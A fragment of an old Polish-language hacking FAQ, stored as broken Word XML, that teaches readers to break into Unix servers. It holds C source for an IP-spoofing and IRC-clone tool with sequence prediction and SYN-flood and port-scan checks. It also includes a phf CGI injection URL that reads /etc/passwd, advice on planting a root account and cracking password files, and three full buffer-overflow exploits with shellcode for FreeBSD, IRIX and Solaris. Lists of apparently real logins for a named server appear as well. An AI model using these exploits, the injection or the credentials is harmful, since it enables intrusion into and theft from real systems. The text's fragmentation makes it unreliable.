%s\n",clonenum+i+1,inet_ntoa(clones[clonenum+i].from.sin_addr));</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ones[clonenum+i].dest=seqpred.des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ones[clonenum+i].dport=seqpred.d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ones[clonenum+i].sport=from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ones[clonenum+i].seq=seqpred.seq+(128000*(i+1))+12800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ones[clonenum+i].ack=seqpred.ack+(64000*(i+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 (i=0;i&lt;i1;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clones[clonenum+i],CF_SYN,NULL,0,1,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leep(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 (i=0;i&lt;i1;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clones[clonenum+i],CF_ACK,NULL,0,6+i1,2);</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leep(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 (i=0;i&lt;i1;i++)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random()%NUMFIRS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while (!j);</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random()%NUMLAS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while (!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ckname=newname(j,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string(&amp;clones[clonenum+i],"\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rintf(s,"NICK %s\n",nicknam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string(&amp;clones[clonenum+i],s);</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rintf(s,"USER %s %s %s :%c%s %c%s\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ckname,inet_ntoa(clones[clonenum+i].from.sin_addr),"nop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upper(*first[j]), first[j] + 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upper(*last[k]), last[k] + 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string(&amp;clones[clonenum+i],s);</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onenum+=i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hile (1)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getircstring();</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 (i=0;i&lt;numclones;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string(&amp;clones[i],p);</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fine NUMSENDPACKETS 5</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id checkipspoofable(struct sockaddr_in dest, short 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rec spoof;</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cprec tcp;</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ort i, start, numrecvd, o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ng lastseq=0, seqlist[NUMSENDPACKETS], timeout, lasttick, diff;</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art=getpid()+1234;</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seq=ran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ack=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from.sin_addr=getlocalip(dest.sin_addr.s_addr);</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dest=des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dport=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 (i=0;i&lt;NUMSENDPACKETS;i++)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sport=start+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spoof,CF_SYN,NULL,0,1,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qlist[i]=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meout=time(NULL)+1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hile ((numrecvd &lt; NUMSENDPACKETS) &amp;&amp; (timeout &gt; time(NULL)))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lasttick != time(NULL))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2d\r",timeout-time(NULL));</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ttick=time(NULL);</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gettcp(&amp;spoof,&amp;tcp))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ntohs(tcp.sport) != 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ntinu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tcp.hrc &amp; CF_ACK) &amp;&amp; (tcp.hrc &amp; CF_RS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Invalid port\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tur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seqlist[ntohs(tcp.dport)-sta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ntinu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d - %lu",ntohs(tcp.dport),ntohl(tcp.seqnum));</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lastseq)</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 - %ld",ntohl(tcp.seqnum)-lastseq);</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tseq=ntohl(tcp.seqnum);</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umrecv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qlist[ntohs(tcp.dport)-start]=ntohl(tcp.seqnum);</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numrecvd)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Results inconclusive, no packets returned. Try again\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tur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Find the first non 0 seq #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hile ((lastseq=seqlist[i])==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tseq=seqlist[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hile (seqlist[i]==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iff=seqlist[i]-lastseq;</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k=numrecv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 (;(i&lt;NUMSENDPACKETS) &amp;&amp; (ok);i++)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seqlist[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ntinu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seqlist[i]-lastseq) &gt;= diff)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seqlist[i]-lastseq) % diff) == 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k=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k=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ls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diff % (seqlist[i]-lastseq)) == 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k=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k=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seqlist[i]-lastseq) &lt; diff)</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iff=seqlist[i]-lastseq;</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o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Machine is spoofable (inc=%lu)\n",diff);</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Machine is NOT spoofable\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fine NUMFLOOD 2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id checksynflood(struct sockaddr_in dest, short d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rec spoof, floo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cprec tcp;</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ort i, ok, sta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ng timeou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ruct sockaddr_in fhos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resolve_host("0.0.0.1",&amp;fhost)&lt;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xit(-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art=(rand()%10000)+2048;</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lood.seq=ran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lood.ack=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lood.from=fhos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lood.dest=des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lood.dport=d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 (i=0;i&lt;NUMFLOOD;i++)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lood.sport=start+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flood,CF_SYN,NULL,0,1,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seq=ran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ack=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from.sin_addr=getlocalip(dest.sin_addr.s_addr);</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dest=des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dport=d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sport=getpi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spoof,CF_SYN,NULL,0,1,4);</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meout=time(NULL)+1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k=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hile ((timeout &gt; time(NULL)) &amp;&amp; (!ok))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gettcp(&amp;spoof,&amp;tcp))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f (ntohs(tcp.dport) == getpid())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k=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o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Machine MIGHT be SYN floodable\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Machine is NOT SYN floodable\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 (i=0;i&lt;NUMFLOOD;i++)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lood.sport=start+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flood,CF_RST,NULL,0,1,2);</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fine OS_UNKNOWN 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fine OS_BSD44 2</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fine OS_LINUX 3</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fine OS_WIN95 4</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fine OSD_WIN95WAIT</w:t>
        <w:tab/>
        <w:t>0x000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id checkos(struct sockaddr_in dest, short d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rec spoof;</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cprec tcp;</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ort done, start, type, flags=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ng timeou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art=(rand()%10000)+2048;</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seq=ran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ack=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from.sin_addr=getlocalip(dest.sin_addr.s_addr);</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dest=des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dport=d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sport=sta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First we'll check for Linux based systems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When sent a FIN/SYN packet it replys with FIN/SYN/ACK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spoof,CF_FIN | CF_SYN,NULL,0,1,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sport=start+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hen we'll check for 4.4 BSD based systems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When sent a SYN/ACK it'll close the connection with the window !0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spoof,CF_SYN | CF_ACK,NULL,0,1,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sport=start+2;</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xt we'll check for Win95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Will respond to FIN/SYN and to FIN */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spoof,CF_FIN,NULL,0,1,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e=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ype=OS_UNKNOW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meout=time(NULL)+1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hile ((timeout &gt; time(NULL)) &amp;&amp; (!don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gettcp(&amp;spoof,&amp;tcp))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ntohs(tcp.sport) != d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ntinu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ntohs(tcp.dport) == star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tcp.hrc &amp; CF_SYN) &amp;&amp; (tcp.hrc &amp; CF_FIN))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ype=OS_LINUX;</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e=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lse if (tcp.hrc &amp; CF_SYN)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flags &amp; OSD_WIN95WAI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e=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ype=OS_WIN95;</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ls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lags |= OSD_WIN95WAI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ntohs(tcp.dport) == (start+1))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tcp.window)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ype=OS_BSD44;</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e=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ntohs(tcp.dport) == (start+2))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tcp.hrc &amp; CF_ACK) &amp;&amp; (tcp.hrc &amp; CF_RS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flags &amp; OSD_WIN95WAI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e=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ype=OS_WIN95;</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ls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lags &amp; OSD_WIN95WAI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witch (typ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OS_UNKNOW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Unknown Operating System\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OS_BSD44:</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Operating System is based off of BSD 4.4\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OS_LINUX:</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Operating System is Linux\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OS_WIN95:</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Operating System is Windows 95/Windows NT\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id scanports(struct sockaddr_in dest, short sport, short e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rec strob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ar *portmap;</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cprec tcp;</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t done=0, index, numfound, curport, source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ng timeou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urceport=getpid()+1024;</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robe.dest=des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robe.from.sin_addr=getlocalip(dest.sin_addr.s_addr);</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robe.seq=ran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robe.ack=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rtmap=(char *)malloc(eport-s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mset(portmap,0,eport-s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meout=time(NULL)+1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umfound=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urport=s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hile (numfound &lt; (eport-spor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timeout &lt; time(NULL))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urport=s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meout=time(NULL)+1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hile ((curport &lt; eport) &amp;&amp; (portmap[curport-s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ur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curport &lt; epor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robe.sport=source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robe.dport=cur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strobe,CF_SYN,NULL,0,1,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ur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hile (gettcp(&amp;strobe,&amp;tcp))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ntohs(tcp.sport) &gt;= eport) || (ntohs(tcp.sport &lt; s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ntinu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dex=ntohs(tcp.sport)-s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portmap[index])</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ntinu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umfoun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rtmap[index]=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tcp.hrc &amp; CF_SYN)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d is listening\n",ntohs(tcp.s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robe.sport=source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robe.dport=tcp.s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strobe,CF_RST,NULL,0,1,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ls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6d\r",ntohs(tcp.s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id checkport(struct sockaddr_in dest, short d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rec spoof;</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cprec tcp;</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ar ch;</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nsigned short sport,sta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ort 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rt=start=(rand()%10000)+2048;</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seq=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ack=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from.sin_addr=getlocalip(dest.sin_addr.s_addr);</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dest=des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dport=d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sport=1234;</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dpor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 (i=1;i&lt;100;i++)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sport=start+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poof.dport=i;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spoof,CF_ACK | CF_SYN,NULL,0,1,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hile (1)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gettcp(&amp;spoof,&amp;tcp))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tcp.window)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Port %d is listening\n",ntohs(tcp.s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ls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f (d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Port %d is NOT listening\n",ntohs(tcp.s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f (dpor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Port: %d\n",ntohs(tcp.d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Flags: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f (tcp.hrc &amp; CF_SYN)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SYN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tcp.hrc &amp; CF_AC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ACK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tcp.hrc &amp; CF_RS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RS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tcp.hrc &amp; CF_FI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FIN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tcp.hrc &amp; CF_PSH)</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PSH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d",tcp.window);</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 (i=0;i&lt;16;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02X ",((unsigned char *)&amp;tcp)[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 (i=16;i&lt;32;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02X ",((unsigned char *)&amp;tcp)[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 (i=32;i&lt;40;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02X ",((unsigned char *)&amp;tcp)[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fread(&amp;ch,sizeof(char),1,stdin) &lt;= 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ntinu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ch == '\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ntinu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sport=s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seq+=6400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witch (ch)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Sending SYN. port %d\n",s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spoof,CF_SYN,NULL,0,1,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2':</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Sending SYN/ACK. port %d\n",s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spoof,CF_ACK | CF_SYN,NULL,0,1,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3':</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Sending FIN. port %d\n",s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spoof,CF_FIN,NULL,0,1,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4':</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Sending FIN/ACK. port %d\n",s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spoof,CF_ACK | CF_FIN,NULL,0,1,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5':</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Sending FIN/SYN. port %d\n",s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spoof,CF_FIN | CF_SYN,NULL,0,1,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6':</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Sending RST. port %d\n",s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spoof,CF_RST,NULL,0,1,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7':</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Sending RST/ACK. port %d\n",s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spoof,CF_ACK | CF_RST,NULL,0,1,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8':</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Sending FIN/SYN/ACK. port %d\n",s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spoof,CF_SYN | CF_ACK | CF_FIN,NULL,0,1,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9':</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Sending SYN/PSH. port %d\n",s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spoof,CF_SYN | CF_PSH,NULL,0,1,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a':</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Sending SYN/RST. port %d\n",s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spoof,CF_SYN | CF_RST,NULL,0,1,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c':</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Sending fragmented SYN. port %d\n",s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ort fragoffs[] = {0,24};</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ort fraglens[] = {24,8};</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frag(&amp;spoof,CF_SYN,NULL,0,1,1,fragoffs,fraglens,2);</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Sending RSTs\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sport=1499;</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dport=6665;</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dtcp(&amp;spoof,CF_RST,NULL,0,10,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id parsearg(char *s, char *forma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_list ap;</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ort d, *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ar *p, *p1, ch;</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_start(ap,forma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hile (*forma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witch (ch=*(forma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witch (*(forma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s':</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Ok, we want the string, find the the char after it so we know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what to look for to end the string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forma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p=strchr(s,ch))==NULL)</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strchr(s,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1=va_arg(ap,char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rncpy(p1,s,p-s);</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1[p-s]=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s);</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p)</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f ((d=atoi(s))==0) {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format ==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atoi(format+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a_arg(ap,shor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format != '[') || ((p=strchr(format,']'))==NULL))</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continu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mat=(p+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hile (isspace(*s) &amp;&amp; *s)</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hile (isdigit(*s) &amp;&amp; *s)</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faul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_end(ap);</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tur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he main function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id main(int argc, char *argv[])</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t i,i1,j,k,done,mode,numclones;</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ruct sockaddr_in host,shos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nsigned short port,fport,spport,flags=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ar s[81],*nickname,*gecos,*serverlistfn,*spooflistfn,*p;</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ar s1[81],username[16],spoofhost[8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it_tcpip();</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Unbuffer stdout and stdin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tvbuf(stdin,NULL,_IONBF,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tvbuf(stdout,NULL,_IONBF,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f there aren't enough parameters, then show them the usag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argc&lt;2)</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usage(argv[0]);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de=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 (i=1;i&lt;argc;i++)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heck to see if we have an argument in the correct styl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f ((argv[i][0]!='-') &amp;&amp; (argv[i][0]!='/'))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sage(argv[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witch (toupper(argv[i][1])) {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H':</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heck to see if this domain name has a port attached to i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rsearg(argv[++i],"%s:%d[7]",s,&amp;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Resolve the hosts IP #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resolve_host(s,&amp;host)&lt;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xit(-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de=1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A':</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resolve_host(argv[++i],&amp;host)&lt;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xit(-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rt=atoi(argv[++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port=atoi(argv[++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de=8;</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P':</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heck to see if this domain name has a port attached to i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rsearg(argv[++i],"%s:%d[7]",s,&amp;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Resolve the hosts IP #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resolve_host(s,&amp;host)&lt;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xit(-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de=1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S':</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heck to see if this domain name has a port attached to i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rsearg(argv[++i],"%s:%d[7]",s,&amp;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Resolve the hosts IP #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resolve_host(s,&amp;host)&lt;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xit(-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de=3;</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O':</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rsearg(argv[++i],"%s:%d[7]",s,&amp;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resolve_host(s,&amp;host)&lt;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xit(-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de=4;</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Checking Operating System of %s\n",getdomainname(hos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rsearg(argv[++i],"%s:%d[6667]:%d[7]",s,&amp;port,&amp;sp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Resolve the IRC server's IP #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resolve_host(s,&amp;host)&lt;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xit(-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heck to see if they have specified a nick/username/gecos combo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i&lt;(argc-1))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ckname=argv[++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rsearg(argv[++i],"%s@%s:%d[4567]",username,spoofhost,&amp;f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cos=argv[++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ls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First make a random nickname and usernam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 j=random()%NUMFIRST; while (!j);</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 k=random()%NUMLAST;  while (!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ckname=newname(j,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rcpy(username,nicknam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hen make the gecos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rintf(s,"%c%s %c%s",</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upper(*first[j]), first[j] + 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upper(*last[k]), last[k] + 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cos=(char *)strdup(s);</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nd lastely the random IP #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rintf(spoofhost,"%d.%d.%d.%d",rand()&amp;255,rand()&amp;255,rand()&amp;255,rand()&amp;255);</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Resolve the spoof'd hos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resolve_host(spoofhost,&amp;shost)&lt;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xit(-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hen print out some info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Connecting to IRC server %s port %d\n",getdomainname(host),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Nickname:  %s\n",nickname);</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user@host: %s@%s\n",username,getdomainname(shos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Irc Name:  %s\n",gecos);</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de=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heck to see if this domain name has a port attached to i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rsearg(argv[++i],"%s:%d[23]",s,&amp;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Resolve the host's IP #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resolve_host(s,&amp;host)&lt;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xit(-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Resolve the spoof'd hos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resolve_host(argv[++i],&amp;shost)&lt;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xit(-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Creating \"telnet\" connection to %s port %d from %s\n",getdomainname(host),port,getdomainname(shos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de=2;</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C':</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umclones=atoi(argv[++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 (i&lt;(argc-1))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rverlistfn=argv[++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listfn=argv[++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ls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rverlistfn="servers.lis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oflistfn="spoofs.lis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ntf("Creating %d clones using irc servers from file %s and ip's from\n",numclones,serverlistfn,spooflistf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de=5;</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F':</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lags |= FL_FLOODHOS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lags |= FL_SPOOFIDENT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W':</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lags |= FL_WAITIDENT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ake up a random ip identification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rand(time(NULL));</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pident=rand()%2000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f it's IRC, then connect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witch (mode)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nnectirc(flags,host,port,nickname,username,shost,fport,spport,gecos);</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reak;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2:</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nnecttelnet(flags,host,port,shos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3:</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ecksynflood(host,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4:</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eckos(host,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5:</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nnectclones(flags,numclones,serverlistfn,spooflistfn);</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8:</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canports(host,port,f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1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eckipspoofable(host,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se 1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eckport(host,por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a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T HIR--</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asswd jak zdobyc i co z nimi zrobic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ind w:right="-180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 poczatek chcialem powiedziec ze nie mam w swej kolekcji duzo passwd moze 5 ,ale na jednym bylem mile zaskoczony Na 8 kont rozszyfrowalem 5 dzieki takim lamerom jak l:Magda p:Magda jesli juz macie takie passwd najpierw posprawdzajcie l:xxx p:xxx a moze root jest takim idiota ze l:root p:root he he he he ;) dobra jak juz macie takie konto to przegrajcie tam chmoda i cat postawcie exploita to zalezy tez od wersji Unixa , w dziale exploity zostawie wam troche na openbsd,irixa i inne a tymczasem odwoluje sie do faqa hellfire ale tylko dlatego ze nie chce mi sie pisac sorki</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-180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ind w:right="-180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Copyright Hellfire </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-180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ind w:right="-180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Wlamywanie - teoria</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Na poczatek trzeba zalozyc co chcemy  zrobic:  proponuje</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dobycie konta z uprawnieniami root-a.  Zeby  to  zrobic</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musisz sie nieco poduczyc jak dziala UNIX:</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lik passwd: znajduje sie najczesciej  w  katalogu  /etc</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awiera on dane  uzytkownika,  przykladowa  linia  pliku</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asswd:</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hellfire:y57Sj.23/nJn7:133:100:Hell Fire:/hellfire:/bin/bash</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ozancza ona uzytkownika  hellfire  o  zakodowanym  hasle</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y57Sj.23/nJn7, numer uzytkonika-133 ,  a  grupa  dostepu</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100, prawdziwe dane to Hell  Fire  :)),  katalog  domowy</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hellfire, a shell  znajduje  sie  w /bin/bash.  Czasami</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amiast 13 znaczkow kodowanego hasla  znajduje  sie  'x'</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tedu  hasla   znajduja   sie   w   pliku  /etc/shadow.</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ierwsza metoda na wlamanie jest  dopisanie  linijki  do</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liku  passwd np.  takiej: hack::0:0:/:/bin/bash.  Wtedy</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o uzytkownik o nazwie hack dostaje uprawnienia  root-a.</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ste nie? Nie! :)) To nie jest takie  proste  zwaszcza</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iedy nie masz zadnago konta na serwerze,  ale  wszystko</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jeszcze przed toba. Mozna tez rozkodowywac  znalezione w</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liku passwd hasla przy pomocy programu  John The Ripper</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mozna tez  wlamujac  sie  do  duzych  serwerow  szukac</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lamerii, ktora lubi nazywac swoje konta bardzo  podobnie</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o loginow lub dodajac na koncu jedynke (to  jak  serwer</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ymaga zeby podano w hasle jakies cyfry). Po znalezieniu</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ostepu do jakiegos konta trzeba  pomyslec  o  dopisaniu</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w. linijki, a teraz juz szczegolowo:</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Jak zdobyc plik passwd?</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Jezeli znamy jakies konto na tym serwerze  wystarczy  do</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niego wejsc i napisac cat /etc/passwd i mamy plik passwd</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prawa sie nieco komplikuje jak nie  mamy  tam  zadnego</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onta.  Wtedy  mozna  zaczac  od  obejrzenia  stron  www</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erwera, czesto jest tam spis  uzytkownikow  domeny,  na</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ewno czesc z tych gosci jest lamerami i n.p.  jak  ktos</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nazywa sie john to haslo ma john1,john,nhoj itp.(chociaz</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ja lamiac kiedys jeden bardzo duzy serwer po zciagnieciu</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 niego okolo 250 kont  nie  rozszyfrowalem  zadnego  po</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mimo uzycia wordlisty 6 Mb a po przerobkach 68 Mb!)  gdy</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uda ci sie zlamac choc  jedno  zgrywaj  do  siebie  plik</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asswd i przejdz do nastepnego punktu. Jezeli jednak  ci</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ie nie  udalo  sproboj  uzyc  nastepujacych  adresow  w</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zegladarce www - w miejsce www.ofiara.com wpisz  nazwe</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erwera.</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http://www.ofiara.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd</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lub</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http://www.ofiara.com/cgi-bin/php.cgi?/plik/do/przejrzenia</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Jak zdobyc plik shadow?</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Jezeli po zciagnieciu pliku passwd okazuje ze  hasla  sa</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hadowane tzn. sa  w pliku  /etc/shadow  to  sprawa  sie</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lekko komplikuje.  Najpierw  sprawdzamy  metody  ktorymi</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dobylismy passwd  (cat,phf,php)  ale  skutecznosc  tych</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metod siega w porywach 1%.  Mozesz  jeszcze  poszukac  w</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oznych backup-ach na dysku (ja jak  wlamywalem  sie  do</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PSA znalazlem zawartosc wszystkich plikow /etc/ w  ka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isks/backup/IV1997/d13/all/etc/etc.tar :-) ).  Jak  ci</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ie uda to do John-a podlacz nie passwd tylko  shadow  i</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zekaj az cos zlamie.</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Mam konto... i co?</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Narazie mozesz  sie  zalogowac,  zobaczyc  co  gosc  tam</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rzyma, poczytac mu poczte, jak serwer jest lamerski,lub</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lamales konto jakiegos goscia  z  duzymi  uprawnieniami</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mozesz sformatowac dyski itp. itd. mozesz  sie  postarac</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alozyc sobie konto (komenda  adduser  lub  bezposrednio</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pisac sie do pliku passwd).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-180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k a teraz obiecane exploity---</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o cos na FreeBsd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T HIR---</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include &lt;stdio.h&g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include &lt;stdlib.h&g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include &lt;unistd.h&g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define BUFFER_SIZE</w:t>
        <w:tab/>
        <w:t>156</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define OFFSET</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>-29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long get_esp(void) { __asm__("movl %esp,%eax\n");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main(int argc, char *argv[])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b/>
        <w:t>char *buf = NULL;</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b/>
        <w:t>unsigned long *addr_ptr = NULL;</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b/>
        <w:t>char *ptr = NULL;</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b/>
        <w:t>char execshell[]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b/>
        <w:t>"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"</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b/>
        <w:t>"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"</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b/>
        <w:t>"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x0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b/>
        <w:t>"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";</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b/>
        <w:t>int i,j;</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b/>
        <w:t>buf = malloc(4096);</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b/>
        <w:t>i = BUFFER_SIZE-strlen(execshell);</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b/>
        <w:t>memset(buf, 0x90, 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b/>
        <w:t>ptr = buf + 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b/>
        <w:t xml:space="preserve">for(i = 0; i &lt; strlen(execshell); i++)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b/>
        <w:tab/>
        <w:t>*ptr++ = execshell[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b/>
        <w:t>addr_ptr = (long *)ptr;</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b/>
        <w:t>for(i=0;i &lt; (104/4); i++)</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b/>
        <w:tab/>
        <w:t>*addr_ptr++ = get_esp() + OFFSE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b/>
        <w:t>ptr = (char *)addr_ptr;</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b/>
        <w:t>*ptr = 0;</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b/>
        <w:t>setenv("HOME", buf, 1);</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b/>
        <w:t>execl("/usr/sbin/ppp", "ppp", NULL);</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T HIR--</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s na irixa</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KUT HIR---</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include &lt;stdio.h&g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include &lt;stdlib.h&g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include &lt;string.h&g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include &lt;sys/types.h&g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include &lt;unistd.h&g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define BUF_LENGTH      200</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define EXTRA           300</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define OFFSET          0x1b0</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define IRIX_NOP        0x03e0f825</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define u_long unsigned</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u_long get_sp_code[] = {</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0x03a01025,0x03e00008,0x00000000,</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u_long irix_shellcode[] = {</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0x24041234,0x2084edcc,0x0491fffe,0x03bd302a,0x23e4012c,0xa086feff,</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0x2084fef8,0x20850110,0xaca4fef8,0xaca6fefc,0x20a5fef8,0x240203f3,</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0x03ffffcc,0x2f62696e,0x2f7368ff,</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char buf[BUF_LENGTH + EXTRA + 8];</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void main(int argc, char **argv) {</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har *env[] = {NULL};</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u_long targ_addr, stack;</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u_long *long_p;</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nt i, code_length = strlen((char *)irix_shellcode)+1;</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u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;</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tack = get_sp();</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long_p =(u_long *)  buf;</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arg_addr = stack + OFFSE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f (argc &gt; 1)</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arg_addr += atoi(argv[1]);</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hile ((targ_addr &amp; 0xff000000) == 0 ||</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arg_addr &amp; 0x00ff0000) == 0 ||</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arg_addr &amp; 0x0000ff00) == 0 ||</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arg_addr &amp; 0x000000ff) == 0)</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arg_addr += 4;</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or (i = 0; i &lt; (BUF_LENGTH - code_length) / sizeof(u_long); i++)</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long_p++ = IRIX_NOP;</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or (i = 0; i &lt; code_length/sizeof(u_long); i++)</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long_p++ = irix_shellcode[i];</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or (i = 0; i &lt; EXTRA / sizeof(u_long); i++)</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long_p++ = (targ_addr &lt;&lt; 24) | (targ_addr &gt;&gt; 8);</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long_p = 0;</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intf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);</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xecle("/bin/login", "login", "-h", &amp;buf[1], 0, env);</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error("execl failed");</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KUT HIR---</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i nawet Solaris sie znalazl:</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rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE" w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>KUT HIR--</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include &lt;stdio.h&g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include &lt;stdlib.h&g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include &lt;sys/types.h&g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include &lt;unistd.h&g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define BUF_LENGTH      1100</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define EXTRA           1200</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define STACK_OFFSET    3800</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define SPARC_NOP       0xa61cc013</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u_char sparc_shellcode[] =</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x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"</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xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"</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x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"</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x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"</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x82\x10\x20\x3b\x91\xd4\xff\xff"</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u_long get_sp(void) {</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__asm__("mov %sp,%i0 \n");</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void main(int argc, char *argv[]) {</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har buf[BUF_LENGTH + EXTRA];</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long targ_addr;</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u_long *long_p;</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u_char *char_p;</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nt i, code_length = strlen(sparc_shellcode),dso=0;</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f(argc &gt; 1) dso=atoi(argv[1]);</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long_p =(u_long *)  buf;</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arg_addr = get_sp() - STACK_OFFSET - dso;</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or (i = 0; i &lt; (BUF_LENGTH - code_length) / sizeof(u_long); i++)</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long_p++ = SPARC_NOP;</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har_p = (u_char *) long_p;</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or (i = 0; i &lt; code_length; i++)</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har_p++ = sparc_shellcode[i];</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long_p = (u_long *) char_p;</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or (i = 0; i &lt; EXTRA / sizeof(u_long); i++)</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long_p++ =targ_addr;</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intf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",</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arg_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);</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xecl("/bin/passwd", "passwd", buf,(char *) 0);</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error("execl failed");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New CE" w:hAnsi="Courier New CE" w:eastAsia="Courier New CE" w:cs="Courier New CE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
        </w:rPr>
        <w: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t>--KUT HIR--</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arazie koniec z exploitami a przynajmniej nie chce mi sie juz tu ich zamieszczac wiec narazie znajdzcie sobie jakies serwerki na Solarisa albo freeBSD i Hula :) no dobra skoncze dzisiaj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thing Special------</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ind w:right="-180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k chcecie troche wiecej exploitow piszcie pgolemo@polbox.com albo ftp-nijcie sie na l:wujkowie p:lancetnik</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1800" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE" w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE" w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i posciagajcie co sie da dawno tam nie zagladalem ale wiem ze ludzie z hackingpl czesto zostawiaja tam to i owo</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rPr>
        <w:t>----</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman CE" w:cs="Times New Roman CE" w:ascii="Times New Roman CE" w:hAnsi="Times New Roman CE"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Troche hacking account------</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bra zobacz:</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uznam.top.pl  </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hydroml p:hydroml</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magda p:magda</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konrad p:konrad</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ntonik p:antonik</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>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ind w:right="-1726"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e chce mi sie pisac ,wejdz na jakiekolwiek sciagnij passwd pospisuj i posprawdzaj l:xxx p:xxx polowa kont tam ma te same passwd co login jak uda ci sie zdobyc roota to daj znac ,a zreszta powalczcie sami !!!!!!! :)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726"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ind w:right="-1726"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ind w:right="-1726"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ind w:right="-1726"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ind w:right="-1726"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reetings---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726"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ind w:right="-1726"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ind w:right="-1726"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bra bede konczyl "mam nadzieje ze nie bylo totalnie lamersko "niektore materialy pochodza z dhcfaq sorki was za to;; nastepny faq bedzie lepszy wiele Jak chcecie mnie spotkac to zapraszam na serwer irc.dal.net na #hackingpl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1726"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propo irc.dal.net jak chcecie zarzucic spoofera to wiem ze 1,2,3 nie chodzi nie wiem jak 4 jak wam sie uda dajcie znac.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="9656" w:leader="none"/>
          <w:tab w:val="left" w:pos="10366" w:leader="none"/>
        </w:tabs>
        <w:spacing w:lineRule="auto" w:line="240"/>
